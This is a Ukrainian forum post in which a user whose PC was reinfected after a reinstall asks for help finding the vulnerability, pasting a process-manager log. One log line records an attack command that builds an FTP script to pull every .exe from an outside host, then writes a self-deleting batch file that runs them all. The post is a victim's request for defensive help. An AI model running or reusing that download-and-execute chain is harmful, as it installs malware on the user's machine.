Допоможіть знайти дірку в системі
Приблизно тиждень тому я був заражений вірусом. Він прийшов на комп'ютер сам (я нічого не запускав). Мабуть, виною діра в системі або ПО. Після цього систему перевстановив. Сьогодні знову виявив атаку на мій PC але вчасно запобіг зараження. Допоможіть знайти і залатати дірку в моїй системі.
Вирізка з логу AnVir Task Manager:
08/28 00:16:10 wmiprvse.exe 3272 started by svchost.exe C: \ WINDOWS \ system32 \ wbem \ wmiprvse.exe (припускаю що запустила служба "Запуск серверних процесів DCOM")
08/28 00:16:38 wmiprvse.exe 1740 started by svchost.exe NT AUTHORITY \ SYSTEM C: \ WINDOWS \ system32 \ wbem \ wmiprvse.exe
08/28 00:16:38 msiexec.exe 1080 started by services.exe NT AUTHORITY \ SYSTEM C: \ WINDOWS \ system32 \ msiexec.exe / V
08/28 00:17:46 cmd.exe 3432 started by wmiprvse.exe COMP \ admin C: \ WINDOWS \ system32 \ cmd.exe / d / c md i2393cd i2393del *. * / F / s / qecho open yBBDD.to .jajaca.com> jecho Wmi >> jecho 123 >> jecho mget * .exe >> jecho bye >> jFTP.EXE -i -s: jdel jecho for %% i in (* .exe) do start %% i> D.batecho for %% i in (* .exe) do %% i >> D.batecho del / f / q% 0% >> D.batD.bat
08/28 00:17:46 ftp.exe 2844 started by cmd.exe COMP \ admin C: \ WINDOWS \ system32 \ ftp.exe -i -s: j
(Широко розкривши рот на скарги фаєрволла про запуск ftp.exe прибиваю його і висмикую 3G модем з роз'єму)
08/28 00:18:16 cmd.exe 3432 terminated, worked 0:29, CPU 0:00 C: \ WINDOWS \ system32 \ cmd.exe
08/28 00:18:16 ftp.exe 2844 terminated, worked 0:29, CPU 0:00 C: \ WINDOWS \ system32 \ ftp.exe
08/28 00:18:56 wmiprvse.exe 3272 terminated, worked 2:45, CPU 0:00 C: \ WINDOWS \ system32 \ wbem \ wmiprvse.exe
Лог перевірки AVZ: